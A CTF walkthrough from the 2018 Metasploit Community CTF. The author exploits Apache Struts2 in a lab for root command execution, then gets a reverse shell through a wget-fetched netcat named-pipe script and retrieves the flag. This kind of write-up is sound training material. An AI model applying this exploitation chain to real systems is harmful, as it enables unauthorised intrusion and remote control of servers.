This year I participated in the Rapid7 Metasploit Community CTF. I wouldn’t say it was beginner level, but it was fun none the less. For the CTF there were 15 png images for the flags. Each flag was worth 100 points. At the start of the event, each team was given a Kali jump box to attack from and two vulnerable machines (one Linux – one Windows) to exploit. You’d think that once a host is compromised, all the flags would be available to find. That wasn’t the case. Each exploitable service was running in its own container. If that service was compromised, then only the flag associated with it would be available. Anyway, ended up with only one flag and three shells. It seems kind of lame, but I learned stuff in the process so that makes it all worth it.
Setting up:
One of the most important takeaways from the event was learning how to set up a port forward for my browser. Previously, I had only used a VNC server to get GUI control and from there use a browser. I did that during the first day of the CTF and it was awful! The next day I looked for a better solution. Someone in the chat posted something about a -D command in SSH. I’m so glad they did! With the -D option SSH will allow dynamic port forwarding and it’s awesome!
Run the ssh command as normal and simply append the -D and a port number of your choosing at the end. This will open a listening port on your local host 127.0.0.1.
Now configure a web browser proxy using the port.
Make sure to:
- Select the same port you put in the SSH command
- Use 127.0.0.1 as the host to connect to
- Select Socks 5 specifically – Using the “for all connections didn’t work for me”
- Remove any disable or ignore settings for 127.0.01
Also make sure that your proxy is enabled. I like using FoxyProxy but it works the same with the default browser options.
The proxy can also work with BurpSuite. Just put the proxy setting for SSH in the user tab of Burp and point your browser proxy to Burp. It works amazingly well.
Ok now that our browser is setup, we need to find something to exploit. Running Nmap shows a lot of open services to poke at. For this walkthrough, I’m focusing on port 8080 running Apache Struts2.
Let’s brows there with our cool new setup and see what it looks like.
Yep it’s for sure running Apache Struts. Let’s see if Metasploit has any exploits for that. Doing a simple search for “struts” brings up a small list of options. I picked the most recent exploit listed.
Since I had no idea if this exploit would apply or how it worked, I brought up the description by using the info command.
Well I don’t have the exact version of struts, but this exploit covers a wide range. It could still work. So I set the rhost and looked through the options.
So this is the second time the redirect action was mentioned. Also, showcase.action was the default action brought up when we browsed to the page. This could work. The rport was already set, but the target information was set to auto. That doesn’t always work so I looked at the options.
Then I manually set it to Linux. Once the target was set the default payload is set as well. Notice it’s not a reverse shell, but a command execution. I would have to supply the command.
The first time I actually chose a ping command (ping -c 4 myIP) so that it would ping back on my own system. I did that because I didn’t think I’d be able to see the output of my command and by using ping, I could see if my command worked by capturing the pingbacks with tcpdump. It did, but this particular payload will also display the output of the command. So for this walkthrough I’m just going to use whoami.
Now let’s execute it. Nope … Failed ☹
Notice how it mentions the Action? We know the target’s right, but we might need a different action.
Going back to the browser and selecting the config tab enables the user to brows for various actions. That’s pretty helpful!
Working my way down through the different actions I finally came to the help action.
When I clicked the link, I noticed that I was redirected to date.action. Hmmmm … this might work.
So I set the action to help.action and tried again.
Success and ROOT!
So now that I have root command execution, I should be able to get a shell. There is one small issue. The semicolon (;) character is not allowed through this exploit. That takes away a lot of options for getting a reverse shell through this command … at least directly. The box does have netcat, but it’s missing the -e option to make things easy on us. Luckily there’s another way to abuse the presence of netcat. Using a first in, first out, named pipe it is possible to get the connection we need.
Since this command does contain semicolon characters, I put it into a file and downloaded it. I used nano to create the file and put in the code.
Now I setup a python http server.
Then I set my Metasploit command to run wget to download the file. Once the command was given, I could see the success broadcast to me in Metasploit.
I could also see it on the HTTP server.
In order to run the script, the permissions settings need to be set to execute. I just set it to 777 to make things easy on me, but in real life that’s probably a bad idea.
There’s never any output from that command if it works so I assumed it did. Now I need to setup a listener. This also could have been done in Metasploit, but this way was just faster.
Now I set the command in Metasploit to run the script. When I run it, it hangs. That’s actually a good sign.
Going back to my netcat listener, I can see that I have a shell!
I have a root shell!!
Now I need to find the flag. Since I didn’t know what flag it was, I just started searching for files with the various card names. I was very happy when I got a hit on hearts. It also wasn’t very far away.
Since this box had md5sum installed, I was able to get the flag hash and upload it for some points, but I also wanted to see it.
While browsing around the website earlier, I found a docs directory. By putting the flag into the docs web directory I could now view and save it.
There is the 10 of hearts in all its glory.
So that was the 10 of Hearts challenge from the 2018 Metasploit CTF. While I didn’t get anywhere near the amount of flags I wanted to, it was still fun and I learned some really cool things. I can’t wait to read some of the other write-ups to see how close I was on some of the other flags.
-R3a50n
